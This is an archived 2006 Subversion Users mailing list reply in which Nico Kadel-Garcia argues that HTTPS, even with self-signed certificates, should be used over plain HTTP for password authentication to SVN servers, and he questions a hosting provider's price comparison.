[svn.haxx.se] · SVN Dev · SVN Users · SVN Org · TSVN Dev · TSVN Users · Subclipse Dev · Subclipse Users · this month's index

Re: Are http-based password authentications secure?

From: Nico Kadel-Garcia <nkadel_at_comcast.net>
Date: 2006-04-27 14:40:19 CEST

Mike.Brenner wrote:
> Hi Nico,
>
> Certainly none of those REQUIRE http.
>
> However, I take it that you grant Kalin's
> point that http "is useful" (read "as safe
> and faster") than https IN THOSE 3
> circumstances?

Those circumstances are so limited as to be useless. *SURE*, you don't much
need a seatbelt if you never leave your driveway. But just as soon as
someone needs access from off-site, or as soon as you're connecting via VPN
from someone's off-site location where the VPN client is not the Subversion
client itself, or as soon as some script kiddie gets access to your wireless
network because you're using WEP instead of WAP or are careless with your
WAP keys, you're toast.

> If you don't, I wonder how you recommend
> sending stuff to non-certificated people?

Usually with a self-signed certificate. Most clients will accept them
gracefully once you've accepted the certificate the first time: wget and the
command line svn are a bit annoying with the whinging about it, but it's
understandable with the security model that SSL was conceived for, which is
host authentication as well as end-to-end encryption.

> As a particular example, the website
> cvsdude sets up an svn server
> for you for $10 per month via
> http, or $30 per month via https.
> Do you recommend: always spend the extra
> $20 per month?

Look again. You're comparing apples to oranges: the difference between
$10/month and $22/month includes 5 times the disk space, 3 times the number
of accounts, WebSVN access, a private Bugzilla, etc., etc., etc.

CVSdude is an interesting service. But using HTTP vs. HTTPS for a public
site is so amazingly stupid that I cannot imagine what the company was
thinking.

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org
Received on Thu Apr 27 14:41:30 2006

This is an archived mail posted to the Subversion Users mailing list.

This site is subject to the Apache Privacy Policy and the Apache Public Forum Archive Policy.